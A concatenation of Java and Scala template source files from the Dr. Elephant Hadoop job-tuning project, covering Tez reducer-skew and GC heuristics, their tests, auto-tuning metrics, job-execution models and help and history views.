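 * {"_candidate": [2048.0, 0.6], "paramSetId": 42}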
*/
@JsonIgnoreProperties(ignoreUnknown = true)
public class Particle {
@JsonProperty("_candidate")
// Todo: Candidate should be a Map<String, Double>?
// todo: rename _candidate to _configurationValues?
private List<Double> _candidate;
private double _fitness;
private double _birthdate;
private boolean _maximize;
@JsonProperty("paramSetId")
private Long _paramSetId;
/**
* Sets the configuration values
* @param candidate Configuration values
*/
public void setCandidate(List<Double> candidate) {
this._candidate = candidate;
}
/**
* Returns the configuration values
* @return Configuration values
*/
public List<Double> getCandidate() {
return _candidate;
}
/**
* Sets fitness of the configuration
* @param fitness Fitness
*/
public void setFitness(double fitness) {
this._fitness = fitness;
}
/**
* Returns the fitness of the configuration
* @return fitness
*/
public double getFitness() {
return _fitness;
}
/**
* Sets the birthdate of the configuration
* @param birthDate Birthdate
*/
public void setBirthdate(double birthDate) {
this._birthdate = birthDate;
}
/**
* Returns the birthdate of the configuration
* @return birth date
*/
public double getBirthdate() {
return _birthdate;
}
/**
* Sets maximize which represents whether the objective of optimization is to maximize or minimize the fitness
   * @param maximize true if the objective is to maximize fitness, false otherwise
*/
public void setMaximize(boolean maximize) {
this._maximize = maximize;
}
/**
* Returns maximize
* @return Maximize
*/
public boolean getMaximize() {
return _maximize;
}
/**
* Sets the param Set Id
* @param paramSetId Param Set Id
*/
public void setPramSetId(Long paramSetId) {
this._paramSetId = paramSetId;
}
/**
* Returns the param set id
* @return the param set id
*/
public Long getParamSetId() {
return _paramSetId;
}
}
<|start_filename|>app/views/help/tez/helpReducerDataSkew.scala.html<|end_filename|>
@*
* Copyright 2016 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*@
<p>
  This analysis shows whether there is data skew among the reduce tasks of the Tez application.
</p>
<p>
  The result of the analysis shows two groups of tasks, where the first group has significantly less input data than the second group.
</p>
<h5>Example</h5>
<p>
<div class="list-group">
<a class="list-group-item list-group-item-danger" href="">
<h4 class="list-group-item-heading">Reducer Data Skew</h4>
<table class="list-group-item-text table table-condensed left-table">
<thead><tr><th colspan="2">Severity: Critical</th></tr></thead>
<tbody>
<tr>
<td>Number of tasks</td>
<td>999</td>
</tr>
<tr>
<td>Group A</td>
<td>875 tasks @@ 28 MB avg</td>
</tr>
<tr>
<td>Group B</td>
<td>124 tasks @@ 2 GB avg</td>
</tr>
</tbody>
</table>
</a>
</div>
</p>
<h3>Suggestions</h3>
<p>
    Check whether the number of reducers is being determined appropriately. You can enable optimization of skew joins (i.e. imbalanced joins) by setting the hive.optimize.skewjoin property to true.<br>
    Setting hive.skewjoin.key to a specified number of rows (for example 10000) lets the job
    determine whether a join is skewed.<br>
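    For example (the key threshold below is only illustrative):
    <ul>
      <li>set hive.optimize.skewjoin=true;</li>
      <li>set hive.skewjoin.key=10000;</li>
    </ul>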
</p>
<|start_filename|>app/controllers/AutoTuningMetricsController.java<|end_filename|>
package controllers;
import static com.codahale.metrics.MetricRegistry.name;
import org.apache.log4j.Logger;
import play.Configuration;
import play.libs.Json;
import play.mvc.Controller;
import play.mvc.Result;
import com.codahale.metrics.Gauge;
import com.codahale.metrics.Meter;
import com.codahale.metrics.MetricRegistry;
import com.codahale.metrics.Timer;
import com.codahale.metrics.Timer.Context;
import com.linkedin.drelephant.AutoTuner;
public class AutoTuningMetricsController extends Controller {
private static final String METRICS_NOT_ENABLED = "Metrics not enabled";
private static MetricRegistry _metricRegistry = null;
private static final Logger logger = Logger.getLogger(AutoTuningMetricsController.class);
private static int _fitnessComputeWaitExecutions = -1;
private static int _baselineComputeWaitJobs = -1;
private static int _azkabanStatusUpdateWaitExecutions = -1;
private static int _paramSetGenerateWaitJobs = -1;
private static Meter _getCurrentRunParametersFailures;
private static Meter _fitnessComputedExecutions;
private static Meter _successfulExecutions;
private static Meter _failedExecutions;
private static Meter _paramSetGenerated;
private static Meter _baselineComputed;
private static Meter _paramSetNotFound;
private static Meter _newAutoTuningJob;
private static Timer _getCurrentRunParametersTimer;
public static void init() {
// Metrics registries will be initialized only if enabled
if (!Configuration.root().getBoolean("metrics", false)) {
logger.debug("Metrics not enabled in the conf file.");
return;
}
// Metrics & healthcheck registries will be initialized only once
if (_metricRegistry != null) {
logger.debug("Metric registries already initialized.");
return;
}
_metricRegistry = new MetricRegistry();
String autoTunerClassName = AutoTuner.class.getSimpleName();
String apiClassName = Application.class.getSimpleName();
//API timer and failed counts
_getCurrentRunParametersTimer = _metricRegistry.timer(name(apiClassName, "getCurrentRunParametersResponses"));
_getCurrentRunParametersFailures =
_metricRegistry.meter(name(apiClassName, "getCurrentRunParametersFailures", "count"));
//Daemon counters
_fitnessComputedExecutions = _metricRegistry.meter(name(autoTunerClassName, "fitnessComputedExecutions", "count"));
_successfulExecutions = _metricRegistry.meter(name(autoTunerClassName, "successfulExecutions", "count"));
_failedExecutions = _metricRegistry.meter(name(autoTunerClassName, "failedExecutions", "count"));
_paramSetGenerated = _metricRegistry.meter(name(autoTunerClassName, "paramSetGenerated", "count"));
_baselineComputed = _metricRegistry.meter(name(autoTunerClassName, "baselineComputed", "count"));
_paramSetNotFound = _metricRegistry.meter(name(autoTunerClassName, "paramSetNotFound", "count"));
_newAutoTuningJob = _metricRegistry.meter(name(autoTunerClassName, "newAutoTuningJob", "count"));
_metricRegistry.register(name(autoTunerClassName, "fitnessComputeWaitExecutions", "size"), new Gauge<Integer>() {
@Override
public Integer getValue() {
return _fitnessComputeWaitExecutions;
}
});
_metricRegistry.register(name(autoTunerClassName, "baselineComputeWaitJobs", "size"), new Gauge<Integer>() {
@Override
public Integer getValue() {
return _baselineComputeWaitJobs;
}
});
_metricRegistry.register(name(autoTunerClassName, "azkabanStatusUpdateWaitExecutions", "size"), new Gauge<Integer>() {
@Override
public Integer getValue() {
return _azkabanStatusUpdateWaitExecutions;
}
});
_metricRegistry.register(name(autoTunerClassName, "paramSetGenerateWaitJobs", "size"), new Gauge<Integer>() {
@Override
public Integer getValue() {
return _paramSetGenerateWaitJobs;
}
});
}
public static void setFitnessComputeWaitJobs(int fitnessComputeWaitJobs) {
_fitnessComputeWaitExecutions = fitnessComputeWaitJobs;
}
public static void setBaselineComputeWaitJobs(int baselineComputeWaitJobs) {
_baselineComputeWaitJobs = baselineComputeWaitJobs;
}
public static void setAzkabanStatusUpdateWaitJobs(int azkabanStatusUpdateWaitJobs) {
_azkabanStatusUpdateWaitExecutions = azkabanStatusUpdateWaitJobs;
}
public static void setParamSetGenerateWaitJobs(int paramSetGenerateWaitJobs) {
_paramSetGenerateWaitJobs = paramSetGenerateWaitJobs;
}
public static void markSuccessfulJobs() {
if (_successfulExecutions != null) {
_successfulExecutions.mark();
}
}
public static void markNewAutoTuningJob() {
if (_newAutoTuningJob != null) {
_newAutoTuningJob.mark();
}
}
public static void markParamSetNotFound() {
if (_paramSetNotFound != null) {
_paramSetNotFound.mark();
}
}
public static void markFailedJobs() {
if (_failedExecutions != null) {
_failedExecutions.mark();
}
}
public static void markParamSetGenerated() {
if (_paramSetGenerated != null) {
_paramSetGenerated.mark();
}
}
public static void markFitnessComputedJobs() {
if (_fitnessComputedExecutions != null) {
_fitnessComputedExecutions.mark();
}
}
public static void markBaselineComputed() {
if (_baselineComputed != null) {
_baselineComputed.mark();
}
}
public static void markGetCurrentRunParametersFailures() {
if (_getCurrentRunParametersFailures != null) {
_getCurrentRunParametersFailures.mark();
}
}
public static Context getCurrentRunParametersTimerContext() {
    if (_getCurrentRunParametersTimer != null) {
      return _getCurrentRunParametersTimer.time();
    } else {
      return null;
    }
}
/**
* The endpoint /metrics
* Endpoint can be queried if metrics is enabled.
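   * Example query (host and port are deployment-specific): curl http://localhost:8080/metrics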
*
* @return Will return all the metrics in Json format.
*/
public static Result index() {
if (_metricRegistry != null) {
return ok(Json.toJson(_metricRegistry));
} else {
return ok(Json.toJson(METRICS_NOT_ENABLED));
}
}
}
<|start_filename|>test/com/linkedin/drelephant/tez/heuristics/ReducerDataSkewHeuristicTest.java<|end_filename|>
/*
* Copyright 2017 Electronic Arts Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*
*/
package com.linkedin.drelephant.tez.heuristics;
import com.linkedin.drelephant.analysis.*;
import com.linkedin.drelephant.configurations.heuristic.HeuristicConfigurationData;
import com.linkedin.drelephant.tez.data.TezApplicationData;
import com.linkedin.drelephant.tez.data.TezCounterData;
import com.linkedin.drelephant.tez.data.TezTaskData;
import junit.framework.TestCase;
import java.io.IOException;
import java.util.HashMap;
import java.util.Map;
public class ReducerDataSkewHeuristicTest extends TestCase{
private static final long UNITSIZE = HDFSContext.HDFS_BLOCK_SIZE / 64; //1mb
private static final long UNITSIZETIME = 1000000; //1000sec
private static Map<String, String> paramsMap = new HashMap<String, String>();
private static Heuristic _heuristic = new ReducerDataSkewHeuristic(new HeuristicConfigurationData("test_heuristic",
"test_class", "test_view", new ApplicationType("test_apptype"), paramsMap));
public void testCritical() throws IOException {
assertEquals(Severity.CRITICAL, analyzeJob(200, 200, 1 * UNITSIZE, 100 * UNITSIZE));
}
public void testSevere() throws IOException {
assertEquals(Severity.SEVERE, analyzeJob(200, 200, 10 * UNITSIZE, 100 * UNITSIZE));
}
public void testModerate() throws IOException {
assertEquals(Severity.MODERATE, analyzeJob(200, 200, 20 * UNITSIZE, 100 * UNITSIZE));
}
public void testLow() throws IOException {
assertEquals(Severity.LOW, analyzeJob(200, 200, 30 * UNITSIZE, 100 * UNITSIZE));
}
public void testNone() throws IOException {
assertEquals(Severity.NONE, analyzeJob(200, 200, 50 * UNITSIZE, 100 * UNITSIZE));
}
public void testSmallFiles() throws IOException {
assertEquals(Severity.NONE, analyzeJob(200, 200, 1 * UNITSIZE, 5 * UNITSIZE));
}
public void testSmallTasks() throws IOException {
assertEquals(Severity.NONE, analyzeJob(5, 5, 10 * UNITSIZE, 100 * UNITSIZE));
}
public void testCriticalTime() throws IOException {
assertEquals(Severity.CRITICAL, analyzeJobTime(200, 200, 1 * UNITSIZETIME, 100 * UNITSIZETIME));
}
public void testSevereTime() throws IOException {
assertEquals(Severity.SEVERE, analyzeJobTime(200, 200, 10 * UNITSIZETIME, 100 * UNITSIZETIME));
}
public void testModerateTime() throws IOException {
assertEquals(Severity.MODERATE, analyzeJobTime(200, 200, 20 * UNITSIZETIME, 100 * UNITSIZETIME));
}
public void testLowTime() throws IOException {
assertEquals(Severity.LOW, analyzeJobTime(200, 200, 30 * UNITSIZETIME, 100 * UNITSIZETIME));
}
public void testNoneTime() throws IOException {
assertEquals(Severity.NONE, analyzeJobTime(200, 200, 50 * UNITSIZETIME, 100 * UNITSIZETIME));
}
public void testSmallTasksTime() throws IOException {
assertEquals(Severity.NONE, analyzeJobTime(5, 5, 10 * UNITSIZETIME, 100 * UNITSIZETIME));
}
private Severity analyzeJob(int numSmallTasks, int numLargeTasks, long smallInputSize, long largeInputSize)
throws IOException {
TezCounterData jobCounter = new TezCounterData();
TezTaskData[] reducers = new TezTaskData[numSmallTasks + numLargeTasks + 1];
TezCounterData smallCounter = new TezCounterData();
smallCounter.set(TezCounterData.CounterName.SHUFFLE_BYTES, smallInputSize);
TezCounterData largeCounter = new TezCounterData();
largeCounter.set(TezCounterData.CounterName.SHUFFLE_BYTES, largeInputSize);
int i = 0;
for (; i < numSmallTasks; i++) {
reducers[i] = new TezTaskData("task-id-"+i, "task-attempt-id-"+i);
reducers[i].setTimeAndCounter(new long[5], smallCounter);
}
for (; i < numSmallTasks + numLargeTasks; i++) {
reducers[i] = new TezTaskData("task-id-"+i, "task-attempt-id-"+i);
reducers[i].setTimeAndCounter(new long[5], largeCounter);
}
// Non-sampled task, which does not contain time and counter data
reducers[i] = new TezTaskData("task-id-"+i, "task-attempt-id-"+i);
TezApplicationData data = new TezApplicationData().setCounters(jobCounter).setReduceTaskData(reducers);
HeuristicResult result = _heuristic.apply(data);
return result.getSeverity();
}
private Severity analyzeJobTime(int numSmallTasks, int numLongTasks, long smallTimeTaken, long longTimeTaken)
throws IOException {
TezCounterData jobCounter = new TezCounterData();
TezTaskData[] reducers = new TezTaskData[numSmallTasks + numLongTasks + 1];
int i = 0;
for (; i < numSmallTasks; i++) {
reducers[i] = new TezTaskData("task-id-"+i, "task-attempt-id-"+i);
reducers[i].setTotalTimeMs(smallTimeTaken, true);
reducers[i].setCounter(jobCounter);
}
for (; i < numSmallTasks + numLongTasks; i++) {
reducers[i] = new TezTaskData("task-id-"+i, "task-attempt-id-"+i);
reducers[i].setTotalTimeMs(longTimeTaken, true);
reducers[i].setCounter(jobCounter);
}
// Non-sampled task, which does not contain time data
reducers[i] = new TezTaskData("task-id-"+i, "task-attempt-id-"+i);
TezApplicationData data = new TezApplicationData().setCounters(jobCounter).setReduceTaskData(reducers);
HeuristicResult result = _heuristic.apply(data);
return result.getSeverity();
}
}
<|start_filename|>app/com/linkedin/drelephant/tez/heuristics/TezScopeGCHeuristic.java<|end_filename|>
/*
* Copyright 2017 Electronic Arts Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*
*/
package com.linkedin.drelephant.tez.heuristics;
import com.linkedin.drelephant.configurations.heuristic.HeuristicConfigurationData;
import com.linkedin.drelephant.tez.data.TezApplicationData;
import com.linkedin.drelephant.tez.data.TezCounterData;
import com.linkedin.drelephant.tez.data.TezTaskData;
import com.linkedin.drelephant.util.Utils;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import com.linkedin.drelephant.analysis.Heuristic;
import com.linkedin.drelephant.analysis.HeuristicResult;
import com.linkedin.drelephant.analysis.Severity;
import com.linkedin.drelephant.math.Statistics;
import java.util.Map;
import org.apache.log4j.Logger;
/**
* Analyses garbage collection efficiency
*/
public class TezScopeGCHeuristic extends GenericGCHeuristic {
  private static final Logger logger = Logger.getLogger(TezScopeGCHeuristic.class);
public TezScopeGCHeuristic(HeuristicConfigurationData heuristicConfData) {
super(heuristicConfData);
}
@Override
protected TezTaskData[] getTasks(TezApplicationData data) {
return data.getScopeTasks();
}
}
<|start_filename|>app/views/tags/pagination.scala.html<|end_filename|>
@*
* Copyright 2016 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*@
@(paginationStats: controllers.PaginationStats, route:Call)
@*
* The layout of the pagination bar.
*
* @param paginationStats The pagination information
* @param route the search call to be made
*@
<div class="pagination">
@searchQuery() = @{
var queryString = paginationStats.getQueryString()
if (queryString != null)
queryString + "&"
else
queryString
}
@if(paginationStats.getCurrentPage() == 1) {
<li class="disabled"><a href="./" onclick="return false;">Previous</a></li>
} else {
<li><a href="@route?@(searchQuery())page=@(paginationStats.getCurrentPage() - 1)">Previous</a></li>
}
@for(page <- paginationStats.getPaginationBarStartIndex() until paginationStats.getCurrentPage()) {
<li><a href="@route?@(searchQuery())page=@page">@page</a></li>
}
<li class="active"><a href="#">@(paginationStats.getCurrentPage())</a></li>
@for(page <- paginationStats.getCurrentPage() + 1 until paginationStats.getPaginationBarEndIndex() + 1) {
<li><a href="@route?@(searchQuery())page=@page">@page</a></li>
}
@if(paginationStats.getCurrentPage() == paginationStats.getPaginationBarEndIndex()) {
<li class="disabled"><a href="./" onclick="return false;">Next</a></li>
} else {
<li><a href="@route?@(searchQuery())page=@(paginationStats.getCurrentPage() + 1)">Next</a></li>
}
</div>
<|start_filename|>app/com/linkedin/drelephant/tez/data/TezApplicationData.java<|end_filename|>
/*
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*
*/
package com.linkedin.drelephant.tez.data;
import com.linkedin.drelephant.analysis.ApplicationType;
import com.linkedin.drelephant.analysis.HadoopApplicationData;
import java.util.Properties;
/**
* Tez Application level data structure which hold all task data
*/
public class TezApplicationData implements HadoopApplicationData {
private static final ApplicationType APPLICATION_TYPE = new ApplicationType("TEZ");
private String _appId = "";
private Properties _conf;
private boolean _succeeded = true;
private TezTaskData[] _reduceTasks;
private TezTaskData[] _mapTasks;
private TezTaskData[] _scopeTasks;
private TezCounterData _counterHolder;
private long _submitTime = 0;
private long _startTime = 0;
private long _finishTime = 0;
public boolean getSucceeded() {
return _succeeded;
}
@Override
public String getAppId() {
return _appId;
}
@Override
public Properties getConf() {
return _conf;
}
@Override
public ApplicationType getApplicationType() {
return APPLICATION_TYPE;
}
@Override
public boolean isEmpty() {
return _succeeded && getMapTaskData().length == 0 && getReduceTaskData().length == 0;
}
public TezTaskData[] getReduceTaskData() {
return _reduceTasks;
}
public TezTaskData[] getMapTaskData() {
return _mapTasks;
}
public long getSubmitTime() {
return _submitTime;
}
public long getStartTime() {
return _startTime;
}
public long getFinishTime() {
return _finishTime;
}
public TezCounterData getCounters() {
return _counterHolder;
}
public TezApplicationData setCounters(TezCounterData counterHolder) {
this._counterHolder = counterHolder;
return this;
}
public TezApplicationData setAppId(String appId) {
this._appId = appId;
return this;
}
public TezApplicationData setConf(Properties conf) {
this._conf = conf;
return this;
}
public TezApplicationData setSucceeded(boolean succeeded) {
this._succeeded = succeeded;
return this;
}
public TezApplicationData setReduceTaskData(TezTaskData[] reduceTasks) {
this._reduceTasks = reduceTasks;
return this;
}
public TezApplicationData setMapTaskData(TezTaskData[] mapTasks) {
this._mapTasks = mapTasks;
return this;
}
public TezTaskData[] getScopeTasks() {
return _scopeTasks;
}
public void setScopeTasks(TezTaskData[] _scopeTasks) {
this._scopeTasks = _scopeTasks;
}
public TezApplicationData setSubmitTime(long submitTime) {
this._submitTime = submitTime;
return this;
}
public TezApplicationData setStartTime(long startTime) {
this._startTime = startTime;
return this;
}
public TezApplicationData setFinishTime(long finishTime) {
this._finishTime = finishTime;
return this;
}
public String toString(){
return APPLICATION_TYPE.toString() + " " + _appId;
}
}
<|start_filename|>app/views/results/flowMetricsHistoryResults.scala.html<|end_filename|>
@*
* Copyright 2016 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*@
@(flowDefPair: IdUrlPair, graphType: String, results: java.util.Map[IdUrlPair, java.util.Map[IdUrlPair, java.util.List[models.AppResult]]],
idPairToJobNameMap: java.util.Map[IdUrlPair, String], flowExecTimeList: java.util.List[Long])
@import com.linkedin.drelephant.util.Utils;
@import com.linkedin.drelephant.analysis.Severity
@import scala.Predef; var jobDefIndex = 0
@getSeverityColor(severity: Severity) = @{
var color: String = "#5cb85c"; // LOW or NONE
if(severity.getText.equalsIgnoreCase("CRITICAL")) {
color = "#d9534f"
} else if(severity.getText.equalsIgnoreCase("SEVERE")) {
color = "#e4804e"
} else if(severity.getText.equalsIgnoreCase("MODERATE")) {
color = "#f0ad4e"
}
color
}
@if(results != null && results.nonEmpty) {
<div class="box shadow details-container">
<h4><a href="@flowDefPair.getId()">Flow History</a></h4>
<hr class="horizontal-line">
@if(graphType.equals("resources")) {
<script src="@routes.Assets.at("js/flowresourcehistoryform.js")" type="text/javascript"></script>
<script src="@routes.Assets.at("js/graphresourcesmetricsutility.js")" type="text/javascript"></script>
<script src="@routes.Assets.at("js/resourcegraphtooltiputility.js")" type="text/javascript"></script>
} else {
<script src="@routes.Assets.at("js/flowtimehistoryform.js")" type="text/javascript"></script>
<script src="@routes.Assets.at("js/graphtimemetricsutility.js")" type="text/javascript"></script>
<script src="@routes.Assets.at("js/timegraphtooltiputility.js")" type="text/javascript"></script>
}
<div>
<!-- Performance Score Graph -->
<div class="history-graph">
<img src='@routes.Assets.at("images/loading.gif")' id='loading-indicator' alt='Loading...' class="loading-indicator"/>
<svg class="svg-graph graph-padding" id="visualisation" ></svg>
</div>
<hr>
<!-- The tabular results -->
<div class="table-responsive">
<table class="table table-striped table-bordered table-hover">
<thead>
<tr>
<th class="history-table-first-column">Flow Executions</th>
@for((jobDefPair, jobName) <- idPairToJobNameMap) {
<th class="history-table-metrics-column">
<a href='./newjobhistory?job-def-id=@helper.urlEncode(jobDefPair.getUrl)&select-graph-type=@graphType' data-toggle='tooltip'
title='@jobDefPair.getUrl'>Job @{jobDefIndex = jobDefIndex + 1; jobDefIndex}<br>
@if(jobName.length > 45) { @jobName.substring(0, 41)... } else { @jobName }
</a>
<table class="history-table-metrics-table">
<tr><td>
<!-- div containing the header table -->
<div>
<table class="history-table-metrics-table">
<tbody>
<tr>
<td class="used-resource-block hasTooltip"><img src='@routes.Assets.at("images/usedmemory.png")' class="metrics-icons-table" alt='used resources'/>
<div id="tooltip-div">
<span> The resources used by the stage in GB Hours</span>
</div>
</td>
<td class="wasted-resource-block hasTooltip"><img src='@routes.Assets.at("images/wastedmemory.png")' class="metrics-icons-table" alt='wasted resources'/>
<div id="tooltip-div">
<span> The total resources wasted by the stage in GB Hours</span>
</div>
</td>
<td class="run-time-block hasTooltip"><img src='@routes.Assets.at("images/runtime.png")' class="metrics-icons-table" alt='total runtime'/>
<div id="tooltip-div">
<span> The total running time of the stage in HH:MM:SS</span>
</div>
</td>
<td class="wait-time-block hasTooltip"><img src='@routes.Assets.at("images/waittime.png")' class="metrics-icons-table" alt='total wait time'/>
<div id="tooltip-div">
<span> The total wait time for the stage in HH:MM:SS</span>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</td>
</tr>
</table>
</th>
}
</tr>
</thead>
<tbody>
@for((flowExecPair, jobMap) <- results) {
<tr>
<!-- The First column, execution id -->
<td class="history-table-first-column">
<a class="exectime" href='@flowExecPair.getUrl' data-toggle='tooltip' title='@flowExecPair.getUrl'>Loading...</a>
</td>
<!-- The remaining columns -->
@for((jobDefPair, jobName) <- idPairToJobNameMap) {
<td class="history-table-metrics-column">
@if(jobMap.get(jobDefPair) != null) {
<div>
<table class="table table-bordered history-table-metrics-table">
<tbody>
<tr>
<td class="used-resource-block hasTooltip" >@Utils.getResourceInGBHours(Utils.getTotalResources(jobMap.get(jobDefPair))).split("GB")(0)
</td>
<td class="wasted-resource-block hasTooltip">@Utils.getResourceInGBHours(Utils.getTotalWastedResources(jobMap.get(jobDefPair))).split("GB")(0)
</td>
<td class="run-time-block hasTooltip">@(Utils.getDurationBreakdown(Utils.getTotalRuntime(jobMap.get(jobDefPair))).split("Hours")(0))
</td>
<td class="wait-time-block hasTooltip">@(Utils.getDurationBreakdown(Utils.getTotalWaittime(jobMap.get(jobDefPair))).split("Hours")(0))
</td>
</tr>
</tbody>
</table>
</div>
}
</td>
}
</tr>
}
</tbody>
</table>
</div>
</div>
</div>
}
<|start_filename|>app/models/JobExecution.java<|end_filename|>
/*
* Copyright 2016 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package models;
import java.sql.Timestamp;
import javax.persistence.CascadeType;
import javax.persistence.Column;
import javax.persistence.Entity;
import javax.persistence.EnumType;
import javax.persistence.Enumerated;
import javax.persistence.GeneratedValue;
import javax.persistence.GenerationType;
import javax.persistence.Id;
import javax.persistence.JoinColumn;
import javax.persistence.JoinTable;
import javax.persistence.ManyToOne;
import javax.persistence.Table;
import com.avaje.ebean.annotation.UpdatedTimestamp;
import play.db.ebean.Model;
@Entity
@Table(name = "job_execution")
public class JobExecution extends Model {
private static final long serialVersionUID = 1L;
public enum ExecutionState {
NOT_STARTED, IN_PROGRESS, SUCCEEDED, FAILED, CANCELLED
}
public static class TABLE {
public static final String TABLE_NAME = "job_execution";
public static final String id = "id";
public static final String jobExecId = "jobExecId";
public static final String executionState = "executionState";
public static final String resourceUsage = "resourceUsage";
public static final String executionTime = "executionTime";
public static final String inputSizeInBytes = "inputSizeInBytes";
public static final String jobExecUrl = "jobExecUrl";
public static final String jobDefinition = "jobDefinition";
public static final String flowExecution = "flowExecution";
public static final String job = "job";
public static final String createdTs = "createdTs";
public static final String updatedTs = "updatedTs";
}
@Id
@GeneratedValue(strategy = GenerationType.IDENTITY)
public Long id;
public String jobExecId;
public String jobExecUrl;
@Enumerated(EnumType.STRING)
public ExecutionState executionState;
public Double resourceUsage;
public Double executionTime;
public Double inputSizeInBytes;
@ManyToOne(cascade = CascadeType.ALL)
@JoinTable(name = "flow_execution", joinColumns = {@JoinColumn(name = "flow_execution_id", referencedColumnName = "id")})
public FlowExecution flowExecution;
@Column(nullable = false)
@ManyToOne(cascade = CascadeType.ALL)
@JoinTable(name = "job_definition", joinColumns = {@JoinColumn(name = "job_definition_id", referencedColumnName = "id")})
public JobDefinition job;
@Column(nullable = false)
public Timestamp createdTs;
@Column(nullable = false)
@UpdatedTimestamp
public Timestamp updatedTs;
@Override
public void save() {
this.updatedTs = new Timestamp(System.currentTimeMillis());
super.save();
}
@Override
public void update() {
this.updatedTs = new Timestamp(System.currentTimeMillis());
super.update();
}
public static Finder<Long, JobExecution> find = new Finder<Long, JobExecution>(Long.class, JobExecution.class);
}
<|start_filename|>app/com/linkedin/drelephant/tuning/JobCompleteDetector.java<|end_filename|>
/*
* Copyright 2016 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package com.linkedin.drelephant.tuning;
import controllers.AutoTuningMetricsController;
import java.net.MalformedURLException;
import java.net.URISyntaxException;
import java.util.List;
import models.JobExecution;
import models.JobExecution.ExecutionState;
import models.TuningJobExecutionParamSet;
import org.apache.log4j.Logger;
/**
 * This class polls the scheduler for the completion status of executions and updates the database with the current status
 * of the job.
*/
public abstract class JobCompleteDetector {
private static final Logger logger = Logger.getLogger(JobCompleteDetector.class);
/**
* Updates the status of completed executions
* @throws MalformedURLException MalformedURLException
* @throws URISyntaxException URISyntaxException
*/
public void updateCompletedExecutions() throws MalformedURLException, URISyntaxException {
logger.info("Updating execution status");
List<TuningJobExecutionParamSet> inProgressExecutionParamSet = getExecutionsInProgress();
List<JobExecution> completedExecutions = getCompletedExecutions(inProgressExecutionParamSet);
updateMetrics(completedExecutions);
logger.info("Finished updating execution status");
}
/**
* Updates metrics for auto tuning monitoring for job completion daemon
   * @param completedExecutions List of completed job executions
*/
private void updateMetrics(List<JobExecution> completedExecutions) {
for (JobExecution jobExecution : completedExecutions) {
if (jobExecution.executionState.equals(ExecutionState.SUCCEEDED)) {
AutoTuningMetricsController.markSuccessfulJobs();
} else if (jobExecution.executionState.equals(ExecutionState.FAILED)) {
AutoTuningMetricsController.markFailedJobs();
}
}
}
/**
* Returns the executions in progress
* @return JobExecution list
*/
private List<TuningJobExecutionParamSet> getExecutionsInProgress() {
logger.info("Fetching the executions which are in progress");
List<TuningJobExecutionParamSet> tuningJobExecutionParamSets = TuningJobExecutionParamSet.find.fetch(TuningJobExecutionParamSet.TABLE.jobExecution)
.fetch(TuningJobExecutionParamSet.TABLE.jobSuggestedParamSet)
.where()
.eq(TuningJobExecutionParamSet.TABLE.jobExecution + '.' + JobExecution.TABLE.executionState,
ExecutionState.IN_PROGRESS)
.findList();
logger.info("Number of executions which are in progress: " + tuningJobExecutionParamSets.size());
return tuningJobExecutionParamSets;
}
/**
* Returns the list of completed executions.
* @param inProgressExecutionParamSet List of executions (with corresponding param set) in progress
* @return List of completed executions
* @throws MalformedURLException MalformedURLException
* @throws URISyntaxException URISyntaxException
*/
protected abstract List<JobExecution> getCompletedExecutions(
List<TuningJobExecutionParamSet> inProgressExecutionParamSet) throws MalformedURLException, URISyntaxException;
}
<|start_filename|>app/views/help/tez/helpMapperSpeed.scala.html<|end_filename|>
@*
